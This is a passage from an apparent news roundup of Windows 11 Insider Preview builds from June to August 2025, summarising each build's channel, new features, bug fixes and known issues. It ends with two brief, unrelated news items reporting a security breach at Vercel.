There are four known issues in this build, including one in which for some users, the Shared section in File Explorer Home may be visible even if there is no content to display.

(Get more info about Windows 11 Insider Preview Build 26120.5770.)

Windows 11 Insider Preview Build 26200.5770

Release date: August 29, 2025

Released to: Dev Channel

For those who have Copilot+ PCs, this build introduces a new text action in Click to Do that lets you highlight any simple table from a source and immediately send it to Excel, copy, or share it, without retyping a single cell. You can do this from any document with an embedded table, such as a school calendar from a photo, a table shared over Teams in a meeting, and others.

Those in the Dev Channel who have turned the toggle on to receive the latest updates get several new features and improvements, including one in Narrator called Braille viewer that allows you to see on-screen textual and Braille representation of the output shown on a refreshable Braille display.

The same group also gets a variety of bug fixes rolled out gradually, including for a bug that caused explorer.exe to crash when using Alt + Tab for some Insiders.

There are four known issues in this build, including one in which for some users, the Shared section in File Explorer Home may be visible even if there is no content to display.

(Get more info about Windows 11 Insider Preview Build 26200.5770.)

Windows 11 Insider Preview Build 27934

Release date: August 29, 2025

Released to: Canary Channel

This build includes, in Microsoft’s words, “a small set of general improvements and fixes that improve the overall experience” on Windows.

There are also a number of bug fixes, including one for a bug that caused an increase in DWM crashes in the previous build (which could lead to you seeing a black flash).

There are three known issues in this build, including one in which the red color used for a low space drive in This PC may be unexpectedly light colored. Some of the other colors may also be incorrect, including that black instead of a more visible color is used for space remaining.

(Get more info about Windows 11 Insider Preview Build 27934.)

Windows 11 Insider Preview Build 26120.5761

Release date: August 22, 2025

Released to: Beta Channel

Those in the Beta Channel who have turned the toggle on to receive the latest updates get several new features rolled out gradually, including one that will let you seamlessly resume using apps from your Android phone on your Windows 11 PC, starting with the Spotify app.

The same group also gets a variety of bug fixes rolled out gradually, including one that addresses an issue in which the new “Copy current user settings to the welcome screen and system accounts” setting under Time & Language > Language & Region crashed Settings for some Insiders.

There are four known issues in this build, including one in which for some users, the Shared section in File Explorer Home may be visible even if there is no content to display.

(Get more info about Windows 11 Insider Preview Build 26120.5761.)

Windows 11 Insider Preview Build 26200.5761

Release date: August 22, 2025

Released to: Dev Channel

Those in the Dev Channel who have turned the toggle on to receive the latest updates get several new features rolled out gradually, including one that will let you seamlessly resume using apps from your Android phone on your Windows 11 PC, starting with the Spotify app.

The same group also gets a variety of bug fixes rolled out gradually, including one that addresses an issue in which the new “Copy current user settings to the welcome screen and system accounts” setting under Time & Language > Language & Region crashed Settings for some Insiders.

There are four known issues in this build, including one in which for some users, the Shared section in File Explorer Home may be visible even if there is no content to display.

(Get more info about Windows 11 Insider Preview Build 26200.5761.)

Windows 11 Insider Preview Build 27928

Release date: August 20, 2025

Released to: Canary Channel

This build includes a variety of minor changes, including moving time and language settings from Control Panel to Settings. For instance, you can change your time server in Settings > Time & language > Date & time under “Additional settings.”

A number of bugs have also been fixed, including one in which File Explorer preview windows sometimes appeared when hovering over unrelated app icons in the taskbar.

There are four known issues in this build, including one in which launching cmd non-elevated from the Run dialog may open in Windows Console Host rather than Windows Terminal, even if Windows Terminal is your default terminal app. If you’re experiencing this, you can type wt into Run to launch Windows Terminal directly.

(Get more info about Windows 11 Insider Preview Build 27928.)

Windows 11 Insider Preview Build 26120.5751

Release date: August 15, 2025

Released to: Beta Channel

This build introduces new selection modes in Click to Do for those with Copilot+ PCs. The new modes allow you to select multiple different entity types in a single gesture.

Those in the Beta Channel who have turned the toggle on to receive the latest updates get a variety of new features rolled out gradually, including one that updates the “Open with” section of the File Explorer context menu when right-clicking a file to remove the accent colored backplate behind packaged app icons in the list (for example, for Snipping Tool). The icons should now be bigger and easier to see.

The same group gets a variety of bug fixes rolled out gradually, including one for an issue in which the “Hide this pane” option for the mobile device companion for the Start menu was difficult to see if a custom accent color had been enabled.

There are five known issues in this build, including one in which some Windows Insiders may experience a rollback trying to install this update with a 0x80070005 in Windows Update.

(Get more info about Windows 11 Insider Preview Build 26120.5751.)

Windows 11 Insider Preview Build 26200.5751

Release date: August 15, 2025

Released to: Dev Channel

This build introduces new selection modes in Click to Do for those with Copilot+ PCs. The new modes allow you to select multiple different entity types in a single gesture.

Those in the Dev Channel who have turned the toggle on to receive the latest updates get a variety of new features rolled out gradually, including one that updates the “Open with” section of the File Explorer context menu when right-clicking a file to remove the accent colored backplate behind packaged app icons in the list (for example, for Snipping Tool). The icons should now be bigger and easier to see.

The same group gets a variety of bug fixes rolled out gradually, including one for an issue in which the “Hide this pane” option for the mobile device companion for the Start menu was difficult to see if a custom accent color had been enabled.

There are six known issues in this build, including one in which some Windows Insiders may experience a rollback trying to install this update with a 0x80070005 in Windows Update. 

(Get more info about Windows 11 Insider Preview Build 26200.5751.)

Windows 11 Insider Preview Build 27924

Release date: August 14, 2025

Released to: Canary Channel

This build includes a variety of new features for Copilot+ PCs being rolled out gradually, including previews of Recall and Click-to-Do, as well as an improved Windows Search, agents to make it easier to make changes in Settings, and live captions with real-time translation.

In addition, all PCs get new advanced settings available via Settings > System > Advanced. Notable among the additions are a new Advanced page for fine-grained control.

There are also several bug fixes, including for a bug in which Remote Desktop only used your primary monitor even if it was configured to use multiple monitors.

There are six known issues in this build, including one in which if you are joining the Canary Channel on a new Copilot+ PC from the Dev Channel, Release Preview Channel, or retail, you will lose Windows Hello PIN and biometrics to sign into your PC. You should be able to re-create your PIN by clicking Set up my PIN.

(Get more info about Windows 11 Insider Preview Build 27924.)

Windows 11 Insider Preview Build 26100.5061 (KB5064081)

Release date: August 14, 2025

Released to: Release Preview Channel

This build gradually rolls out a large number of new features, including one for Copilot+ PCs in which Windows Recall opens to a personalized homepage that shows you your recent activity and top-used apps and websites, making it easy to pick up where you left off.

The build also fixes several bugs, including one that prevented some system recovery features from working properly due to a temporary file sharing conflict. This affected certain device management tools and disrupted key functions on some devices.

(Get more info about Windows 11 Insider Preview Build 26100.5061.)

Windows 11 Insider Preview Build 27919

Release date: August 8, 2025

Released to: Canary Channel

This build brings several Windows Search settings into a single page, via Settings > Privacy & security > Search. It also fixes a variety of bugs, including one in which File Explorer sometimes crashed when trying to view the digital signatures tab in the properties for a file.

There are six known issues in this build, including one in which if you are joining the Canary Channel on a new Copilot+ PC from the Dev Channel, Release Preview Channel, or retail, you will lose Windows Hello PIN and biometrics to sign into your PC. You should be able to re-create your PIN by clicking Set up my PIN.

(Get more info about Windows 11 Insider Preview Build 27919.)

Windows 11 Insider Preview Build 26200.5742

Release date: August 8, 2025

Released to: Dev Channel

Those in the Dev Channel who have turned the toggle on to receive the latest updates get a variety of changes being gradually rolled out, including one in which the mobile device companion gets an updated layout that lets you access more information from Start. You can now scroll to access more recent activity items, including messages, calls, photos, mobile app updates and more.

In addition, the same group gets a variety of bug fixes rolled out gradually, including for a bug in which the tooltips in File Explorer unexpectedly stayed visible.

There are nine known issues in this build, including one in which in dark mode, the colors for certain items may be incorrect — for example, the red color used for a low-space drive in This PC may be unexpectedly light colored.

(Get more info about Windows 11 Insider Preview Build 26200.5742.)

Windows 11 Insider Preview Build 26120.5742

Release date: August 8, 2025

Released to: Beta Channel

Those in the Beta Channel who have turned the toggle on to receive the latest updates get a variety of new features rolled out gradually, including one in which six time and language settings are being moved from Control Panel to Settings.

The same group also gets a variety of bug fixes rolled out gradually, including for a bug in which the tooltips in File Explorer sometimes unexpectedly stayed visible.

There are seven known issues in this build, including one in which live captions sometimes crash when you attempt to use live translation on a Copilot+ PC.

(Get more info about Windows 11 Insider Preview Build 26120.5742.)

Windows 11 Insider Preview Build 26120.5733 

Release date: August 1, 2025

Released to: Beta Channel

For Insiders in the Beta Channel who are signed in with a work or school account (Entra ID) and have turned the toggle on to receive the latest updates, File Explorer will begin showing people icons under the “Activity” column on File Explorer Home and on “Recommended” at the top of File Explorer Home. When you hover or click over a people icon, it will display the Live Persona Card for that person from Microsoft 365.

Those in the Beta Channel who have turned the toggle on to receive the latest updates also get a variety of bug fixes rolled out gradually, including one that addresses an issue that caused the Start menu to crash for some Insiders.

There are seven known issues in this build, including one in which live captions sometimes crash when you attempt to use live translation on a Copilot+ PC.

(Get more info about Windows 11 Insider Preview Build 26120.5733.)

Windows 11 Insider Preview Build 26200.5733

Release date: August 1, 2025

Released to: Dev Channel

For Insiders in the Dev Channel who are signed in with a work or school account (Entra ID) and have turned the toggle on to receive the latest updates, File Explorer will begin showing people icons under the “Activity” column on File Explorer Home and on “Recommended” at the top of File Explorer Home. When you hover or click over a people icon, it will display the Live Persona Card for that person from Microsoft 365.

In addition, those in the Dev Channel who have opted to receive the latest updates get a variety of bug fixes rolled out gradually, including one that addresses an issue that caused the Start menu to crash for some Insiders.

There are nine known issues in this build, including one in which in dark mode, the colors for certain items may be incorrect — for example, the red color used for a low-space drive in This PC may be unexpectedly light colored.

(Get more info about Windows 11 Insider Preview Build 26200.5733.)

Windows 11 Insider Preview Build 27913

Release date: July 30, 2025

Released to: Canary Channel

This build, according to Microsoft, “includes a small set of general improvements and fixes that improve the overall experience for Insiders running this build on their PCs.”

It also fixes a variety of bugs, including one in Settings in which the Windows Vista boot sound was unexpectedly being used instead of the Windows 11 boot sound.

There are two known issues in this build, including one in which if you are joining the Canary Channel on a new Copilot+ PC from the Dev Channel, Release Preview Channel, or retail, you will lose Windows Hello PIN and biometrics to sign into your PC. You should be able to re-create your PIN by clicking Set up my PIN.

(Get more info about Windows 11 Insider Preview Build 27913.)

Windows 11 Insider Preview Build 26120.5722 

Release date: July 28, 2025

Released to: Beta Channel

In this build, AMD- and Intel-powered Copilot+ PCs get a new AI-based agent that will change your settings when you ask it to customize your PC in some way. You can describe what you need help with, such as “how to control my PC by voice” or “my mouse pointer is too small,” and the agent will recommend the right steps you can take to address the issue. The agent uses AI to understand your intent, and with your permission, it automates and executes tasks on your behalf. It works only if your primary display language is set to English.

In addition, those in the Beta Channel who have turned the toggle on to receive the latest updates get several new features rolled out gradually, including one in which Windows can apply enterprise pins more quickly to the taskbar when initiated by the IT admins. It reduces the gap between an IT admin applying the pinning policy and when their users see a pin on their taskbar. Today, the policy only applies when Explorer restarts. With this change, the gap is only up to ~8 hours (policy refresh interval) and sidesteps the Explorer restart requirement.

The same group also gets a variety of bug fixes rolled out gradually, including one that addresses problems (such as not supporting the swipe-up gesture) with using touch to navigate the new Start menu.

Everyone in the Beta Channel gets a single fix for a bug in which external graphics cards connected over Thunderbolt were unexpectedly not discoverable in some cases.

There are four known issues in this build, including one in which live captions sometimes crash when you attempt to use live translation on a Copilot+ PC.

(Get more info about Windows 11 Insider Preview Build 26120.5722.)

Windows 11 Insider Preview Build 26200.5722 

Release date: July 28, 2025

Released to: Dev Channel

This build is identical to Build 26120.5722 for the Beta Channel. See the listing above for details.

(Get more info about Windows 11 Insider Preview Build 26200.5722.)

Windows 11 Insider Preview Build 27909

Release date: July 25, 2025

Released to: Canary Channel

This build, according to Microsoft, “includes a small set of general improvements and fixes that improve the overall experience for Insiders running this build on their PCs.”

It also fixes a variety of bugs, including one in Settings in which the the battery percentage was missing from the top of System > Power & Battery.

There are five known issues in this build, including one in which if you are joining the Canary Channel on a new Copilot+ PC from the Dev Channel, Release Preview Channel, or retail, you will lose Windows Hello PIN and biometrics to sign into your PC. You should be able to re-create your PIN by clicking Set up my PIN.

(Get more info about Windows 11 Insider Preview Build 27909.)

Windows 11 Insider Preview Build 26120.4741

Release date: July 18, 2025

Released to: Beta Channel

In this build, AMD- and Intel-powered Copilot+ PCs get a new “describe image” action in Click to Do that shows detailed descriptions of images, charts, and graphs, offering a quick overview of the visual content. Snapdragon-powered Copilot+ PCs received the feature previously.

In addition, those in the Beta Channel who have turned the toggle on to receive the latest updates get several new features rolled out gradually, including one in which you can more easily find and use lock screen widgets. The feature can be enabled or disabled with the Discover widgets toggle under Settings > Personalization > Lock screen.

The same group also gets two bug fixes rolled out gradually, including for a bug in which Notification Center content sometimes got clipped if you’d enabled the clock in Notification Center.

There are eight known issues in this build, including one in which using touch to navigate the new Start menu may not work reliably. For example, it currently does not support the swipe-up gesture.

(Get more info about Windows 11 Insider Preview Build 26120.4741.)

Windows 11 Insider Preview Build 26200.5710

Release date: July 18, 2025

Released to: Dev Channel

In this build, AMD- and Intel-powered Copilot+ PCs get a new “describe image” action in Click to Do that shows detailed descriptions of images, charts, and graphs, offering a quick overview of the visual content. Snapdragon-powered Copilot+ PCs have already received the feature.

Those in the Dev Channel who have turned the toggle on to receive the latest updates get a variety of new features rolled out gradually, including one that offers suggestions to help you discover new widgets. The feature can be enabled or disabled using the Discover widgets toggle under Settings > Personalization > Lock screen.

In addition, a variety of bug fixes are being rolled out gradually to the same group, including one that fixes an underlying issue with dbgcore.dll, which led to explorer.exe and some other apps crashing.

There are eight known issues in this build, including one in which multiple error pop-ups about unexpected elements may appear when opening Group Policy Editor.

(Get more info about Windows 11 Insider Preview Build 26200.5710.)

Windows 11 Insider Preview Build 27902

Release date: July 17, 2025

Released to: Canary Channel

This build, according to Microsoft, “includes a small set of general improvements and fixes that improve the overall experience for Insiders running this build on their PCs.”

It also fixes two bugs, including one in which the Camera app got stuck on some PCs after switching between front and back camera.

There are six known issues in this build, including one in which if you are joining the Canary Channel on a new Copilot+ PC from the Dev Channel, Release Preview Channel, or retail, you will lose Windows Hello PIN and biometrics to sign into your PC. You should be able to re-create your PIN by clicking Set up my PIN.

(Get more info about Windows 11 Insider Preview Build 27902.)

Windows 11 Insider Preview Build 26200.5702

Release date: July 14, 2025

Released to: Dev Channel

In this build, Snapdragon-powered Copilot+ PCs get a new “describe image” action in Click to Do, which shows detailed descriptions of images, charts and graphs, offering a quick overview of the visual content. Support for AMD and Intel-powered Copilot+ PCs will be coming soon.

In addition, those in the Dev Channel who have turned the toggle on to receive the latest updates get a variety of bug fixes rolled out gradually, including Administrator protection, a security feature that aims to protect free floating admin rights for administrator users allowing them to still perform all admin functions with just-in-time admin privileges. This feature is off by default and needs to be enabled via Windows Security under Account protection or via group policy.

The same group gets a variety of bug fixes rolled out gradually, including one for a bug that caused random File Explorer preview windows to appear when hovering over unrelated app icons in the taskbar.

There are eight known issues in this build, including one in which multiple error pop-ups about unexpected elements may appear when opening Group Policy Editor.

(Get more info about Windows 11 Insider Preview Build 26200.5702.)

Windows 11 Insider Preview Build 26120.4733

Release date: July 14, 2025

Released to: Beta Channel

In this build, Snapdragon-powered Copilot+ PCs get a new “describe image” action in Click to Do, which shows detailed descriptions of images, charts, and graphs, offering a quick overview of the visual content. Support for AMD and Intel-powered Copilot+ PCs will be coming soon.

In addition, those in the Beta Channel who have turned the toggle on to receive the latest updates get a variety of bug fixes rolled out gradually, including Administrator protection, a security feature that aims to protect free floating admin rights for administrator users, allowing them to still perform all admin functions with just-in-time admin privileges. This feature is off by default and needs to be enabled via Windows Security under Account protection or via group policy.

A variety of bug fixes are being rolled out gradually to the same group, including one that addresses an issue in which app updates sometimes caused the icons for app shortcuts pinned to the desktop to become white pages rather than proper thumbnail images.

There are eight known issues in this build, including one in which using touch to navigate the new Start menu may not work reliably. For example, it currently does not support the swipe-up gesture.

(Get more info about Windows 11 Insider Preview Build 26120.4733.)

Windows 11 Insider Preview Build 27898

Release date: July 11, 2025

Released to: Canary Channel

This build introduces Quick machine recovery, a feature introduced as part of the Windows Resiliency Initiative at Ignite 2024. When enabled, it automatically detects and fixes widespread issues on Windows 11 devices using the Windows Recovery Environment (WinRE). This reduces downtime and avoids the need for manual fixes. If a device experiences a widespread boot issue, it enters WinRE, connects to the internet, and Microsoft can deliver a targeted fix through Windows Update. IT admins can enable or customize this experience for their organization through the Intune Settings Catalog UI using the RemoteRemediation CSP.

There are five known issues in this build, including one in which if you are joining the Canary Channel on a new Copilot+ PC from the Dev Channel, Release Preview Channel, or retail, you will lose Windows Hello PIN and biometrics to sign into your PC. You should be able to re-create your PIN by clicking Set up my PIN.

(Get more info about Windows 11 Insider Preview Build 27898.)

Windows 11 Insider Preview Build 26100.4762 (KB5062660)

Release date: July 10, 2025

Released to: Release Preview Channel

This build gradually rolls out a number of new features, including one for admins in which the Configure Start Pins policy now includes an option to apply Start menu pins only once. This means users will receive the admin Start menu pins on their first sign-in (day 0), but afterward can personalize their pinned layout, and those changes will be retained. This policy can also be applied through group policy, in addition to the existing Configuration Service Provider (CSP).

In addition, several bug fixes are being immediately rolled out, including one that addresses an issue in which File Explorer Home unexpectedly displayed only a single folder (for example, Desktop), rather than the expected content with recent files.

(Get more info about Windows 11 Insider Preview Build 26100.4762.)

Windows 11 Insider Preview Build 27891 

Release date: July 3, 2025

Released to: Canary Channel

In this build, Windows PowerShell 2.0 has been removed. A number of bugs have also been fixed, including one in which the “Reset this PC” option under Settings > System > Recovery did not work.

There are three known issues in this build, including one in which if you are joining the Canary Channel on a new Copilot+ PC from the Dev Channel, Release Preview Channel, or retail, you will lose Windows Hello PIN and biometrics to sign into your PC. You should be able to re-create your PIN by clicking Set up my PIN.

(Get more info about Windows 11 Insider Preview Build 27891.)

Windows 11 Insider Preview Build 26120.4520

Release date: June 27, 2025

Released to: Beta Channel

Those in the Beta Channel who have turned the toggle on to receive the latest updates get new features being rolled out gradually, including 1Password passkey integration in beta.

The same group also gets a variety of bug fixes rolled out gradually, including one for a bug in which File Explorer Home crashed, potentially also making File Explorer crash on launch, since Home is the default section for File Explorer.

There are seven known issues in this build, including one in which using touch to navigate the new Start menu may not work reliably. For example, it currently does not support the swipe-up gesture.

(Get more info about Windows 11 Insider Preview Build 26120.4520.)

Windows 11 Insider Preview Build 26200.5670

Release date: June 27, 2025

Released to: Dev Channel

Those in the Dev Channel who have turned the toggle on to receive the latest updates get new features being rolled out gradually, including 1Password passkey integration in beta.

The same group also gets a variety of bug fixes rolled out gradually, including one for a bug in which File Explorer Home crashed, potentially also making File Explorer crash on launch, since Home is the default section for File Explorer.

Everyone in the Dev Channel gets two bug fixes, including one that addresses the Windows Vista boot sound playing instead of the Windows 11 boot sound.

There are seven known issues in this build, including one in which using touch to navigate the new Start menu may not work reliably. For example, it currently does not support the swipe-up gesture.

(Get more info about Windows 11 Insider Preview Build 26200.5670.)

Windows 11 Insider Preview Build 26120.4452

Release date: June 23, 2025

Released to: Beta Channel

In this build, Copilot+ PCs get a new Windows Recall homepage, which shows you your most recent snapshots so you can quickly return to what you were previously doing, and also displays the top three apps and websites you have spent the most time on in the past 24 hours.

In addition, those in the Beta Channel who have turned the toggle on to receive the latest updates get new features being rolled out gradually, including the option to move the hardware indicators for brightness, volume, airplane mode, and virtual desktops to different positions on your screen.

Some additional improvements are being gradually rolled out to the same group, including the addition of a Boolean to the Configure Start Pins policy to allow admins to apply Start menu pins once. This means that a user will receive admin pins on day 0 but can then make any changes to their Start pinned layout and have those safeguarded. These changes can be optionally applied through the existing configuration service provider (CSP).

A handful of bug fixes are rolling out to the same group, including one that addresses an issue in which File Explorer Home only showed a single folder (like Desktop) and nothing else for some people.

Several bugs have been fixed for everyone in the Beta Channel, including one in which the Windows Vista boot sound played instead of the Windows 11 boot sound.

There are 10 known issues in this build, including one in which after you do a PC reset under Settings > System > Recovery, your build version may incorrectly show as Build 26100 instead of Build 26120. This will not prevent you from getting future Beta Channel updates, which will resolve this issue.

(Get more info about Windows 11 Insider Preview Build 26120.4452.)

Windows 11 Insider Preview Build 26200.5661

Release date: June 23, 2025

Released to: Dev Channel

In this build, Copilot+ PCs get a new Windows Recall homepage, which shows you your most recent snapshots so you can quickly return to what you were previously doing, and also displays the top three apps and websites you have spent the most time on in the past 24 hours.

In addition, those in the Dev Channel who have turned the toggle on to receive the latest updates get new features being rolled out gradually, including the option to move the hardware indicators for brightness, volume, airplane mode, and virtual desktops to different positions on your screen.

The same group also gets a variety of bug fixes rolled out gradually, including one for a bug in which the File Explorer Home only showed a single folder (like Desktop) and nothing else for some people.

Everyone in the Dev Channel gets several bug fixes, including for one in which the Windows Vista boot sound played instead of the Windows 11 boot sound.

There are 10 known issues in this build, including one in which after you do a PC reset under Settings > System > Recovery, your build version may incorrectly show as Build 26100 instead of Build 26200. This will not prevent you from getting future Dev Channel updates, which will resolve this issue.

(Get more info about Windows 11 Insider Preview Build 26200.5661.)

Windows 11 Insider Preview Build 27881 

Release date: June 19, 2025

Released to: Canary Channel

This build introduces speech recapto Narrator. It lets you keep track of what Narrator has said and offers access to it for quick reference. With it, you can quickly access spoken content, follow along with live transcription, and copy what Narrator last said, using keyboard shortcuts.

A number of bugs have also been fixed, including one in which File Explorer crashed when the user tapped the View button using touch.

There are four known issues in this build, including one in which if you are joining the Canary Channel on a new Copilot+ PC from the Dev Channel, Release Preview Channel, or retail, you will lose Windows Hello PIN and biometrics to sign into your PC. You should be able to re-create your PIN by clicking Set up my PIN.

(Get more info about Windows 11 Insider Preview Build 27881.)

Windows 11 Insider Preview Build 26100.4482 (KB5060829)

Release date: June 19, 2025

Released to: Release Preview Channel

This build gradually rolls out a number of new features, including automatic icon resizing in the taskbar to fit more apps, and a new Screen Curtain feature that blacks out the screen while Narrator reads content aloud. Also new is the ability add custom words to the dictionary in voice access.

In addition, several bug fixes are being immediately rolled out, including one that improves the Copilot key’s reliability and resolves an issue that prevented users from restarting Copilot after using the key.

(Get more info about Windows 11 Insider Preview Build 26100.4482.)

Windows 11 Insider Preview Build 26120.4441

Release date: June 13, 2025

Released to: Beta Channel

In this build, those with Copilot+ PCs in the European Economic area get the option to export their Recall snapshots to be shared with third-party apps and websites. When they open Recall for the first time and opt into saving snapshots, they will be shown their unique Recall export code. The Recall export code will be needed if they ever choose to export their Recall snapshots to share with a trusted app or website in the future.

Those in the Beta Channel who have turned the toggle on to receive the latest updates get a variety of new features being gradually rolled out, including a bigger clock with seconds in the notification center.

The same group also gets a variety of bug fixes rolled out gradually, including one for an issue in which folders opened outside of File Explorer would open it in a new File Explorer tab, but the tab wasn’t put in focus.

There are nine known issues in this build, including one in which after you do a PC reset under Settings > System > Recovery, your build version may incorrectly show as Build 26100 instead of Build 26120. This will not prevent you from getting future Beta Channel updates, which will resolve this issue.

(Get more info about Windows 11 Insider Preview Build 26120.4441.)

Windows 11 Insider Preview Build 26200.5651

Release date: June 13, 2025

Released to: Dev Channel

In this build, Copilot+ PCs get agents that can help make it easier to find and change settings on PCs. Rather than dig through settings, you’ll be able to simply describe what you need help with like, “how to control my PC by voice” or “my mouse pointer is too small” and an agent will recommend the right steps you can take to address the issue.

In addition, those in the Dev Channel who have turned the toggle on to receive the latest updates get a variety of new features being gradually rolled out, including a bigger clock with seconds in the notification center.

The same group also gets a variety of bug fixes rolled out gradually, including one for an issue in which folders opened outside of File Explorer would open it in a new File Explorer tab, but the tab wasn’t put in focus.

There are 13 known issues in this build, including one in which after you do a PC reset under Settings > System > Recovery, your build version may incorrectly show as Build 26100 instead of Build 26200. This will not prevent you from getting future Dev Channel updates, which will resolve this issue.

(Get more info about Windows 11 Insider Preview Build 26200.5651.)

Windows 11 Insider Preview Build 26120.4250 

Release date: June 9, 2025

Released to: Beta Channel

Those in the Beta Channel who have turned the toggle on to receive the latest updates get a variety of new features being gradually rolled out, including a larger scrollable Start menu. The menu automatically resizes itself according to the size of your screen, and offers two views, category and grid. In addition, the “Search permissions” and “Searching Windows” settings pages have been combined so you can access all the Windows Search settings under a single page via Settings > Privacy & security > Search.

The same group also gets a variety of bug fixes rolled out gradually, including one for a bug in which input did not work for some Insiders, including when typing into Search, and with the Chinese pinyin IME candidate window, clipboard history, and the emoji panel.

For everyone in the Beta Channel, the build fixes a bug in which some people might have seen severe discoloration when connecting their PC to some older Dolby Vision displays.

There are nine known issues in this build, including one in which after you do a PC reset under Settings > System > Recovery, your build version may incorrectly show as Build 26100 instead of Build 26120. This will not prevent you from getting future Beta Channel updates, which will resolve this issue.

(Get more info about Windows 11 Insider Preview Build 26120.4250.)

Windows 11 Insider Preview Build 26200.5641

Release date: June 9, 2025

Released to: Dev Channel

Those in the Dev Channel who have turned the toggle on to receive the latest updates get a variety of new features being gradually rolled out, including a larger scrollable Start menu. The menu automatically resizes itself according to the size of your screen, and offers two views, category and grid. In addition, the “Search permissions” and “Searching Windows” settings pages have been combined so you can access all the Windows Search settings under a single page via Settings > Privacy & security > Search.

The same group also gets a variety of bug fixes rolled out gradually, including one for a bug in which input did not work for some Insiders, including when typing into Search, and with the Chinese pinyin IME candidate window, clipboard history, and the emoji panel.

For everyone in the Dev Channel, the build fixes a bug in which some people might have seen severe discoloration when connecting their PC to some older Dolby Vision displays.

There are 12 known issues in this build, including one in which after you do a PC reset under Settings > System > Recovery, your build version may incorrectly show as Build 26100 instead of Build 26200. This will not prevent you from getting future Dev Channel updates, which will resolve this issue.

(Get more info about Windows 11 Insider Preview Build 26200.5641.)

Windows 11 Insider Preview Build 27871 

Release date: June 4, 2025

Released to: Canary Channel

In this build, IT administrators can use Microsoft Intune to control the energy saver settings on Windows 11 PCs through group policies and MDM configurations.

A number of bugs have also been fixed, including one in which when Virtualization Based Security was enabled, applications dependent on virtualization, such as VMware Workstation, lost the ability to run unless the “Windows Hypervisor Platform” Windows optional component was installed on the system.

There are two known issues in this build, including one in which if you are joining the Canary Channel on a new Copilot+ PC from the Dev Channel, Release Preview Channel, or retail, you will lose Windows Hello PIN and biometrics to sign into your PC. You should be able to re-create your PIN by clicking Set up my PIN.

(Get more info about Windows 11 Insider Preview Build 27871.)

Windows 11 Insider Preview Build 26120.4230 

Release date: June 2, 2025

Released to: Beta Channel

Those in the Beta Channel who have turned the toggle on to receive the latest updates get a new dedicated settings page for quick machine recovery, which can be found under System > Recovery > Quick machine recovery. This makes it easier to manage recovery options directly from Settings. This is being gradually rolled out.

A variety of bug fixes are being rolled out gradually to the same group, including one addressing a bug that caused File Explorer to crash performing various actions, such as when deleting files. 

For everyone in the Beta Channel, a bug is fixed in which when Virtualization Based Security was enabled, applications dependent on virtualization, such as VMware Workstation, would lose the ability to run unless the “Windows Hypervisor Platform” Windows optional component is installed on the system.

There are nine known issues in this build, including one in which after you do a PC reset under Settings > System > Recovery, your build version may incorrectly show as Build 26100 instead of Build 26120. This will not prevent you from getting future Beta Channel updates, which will resolve this issue.

(Get more info about Windows 11 Insider Preview Build 26120.4230.)

Windows 11 Insider Preview Build 26200.5622 

Release date: June 2, 2025

Released to: Dev Channel

In this build, those with Copilot+ PCs get a new action in Click to Do, Draft with Copilot in Word. Select text, press the Windows key and click simultaneously, and choose Draft with Copilot in Word. Copilot will create an initial draft based on the text.

Those in the Dev Channel who have turned the toggle on to receive the latest updates get new features being rolled out gradually, including quick machine recovery, designed to help Windows 11 devices recover from widespread boot issues by applying remediations through the Windows Recovery Environment (WinRE).

The same group also gets several bug fixes, including for an issue in which File Explorer crashed when performing various actions, such as deleting files.

There are eight known issues in this build, including one in which taskbar icons may appear small even though the setting to show smaller taskbar buttons is configured as “never.”

(Get more info about Windows 11 Insider Preview Build 26200.5622.)

Web infrastructure provider Vercel has disclosed a security breach that allows bad actors to gain unauthorized access to "certain" internal Vercel systems. The incident stemmed from the compromise of Context.ai, a third-party artificial intelligence (AI) tool, that was used by an employee at the company. "The attacker used that access to take over the employee's Vercel Google Workspace account, Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]

Cloud development platform Vercel has disclosed a security incident after threat actors claimed to have breached its systems and are attempting to sell stolen data. [...]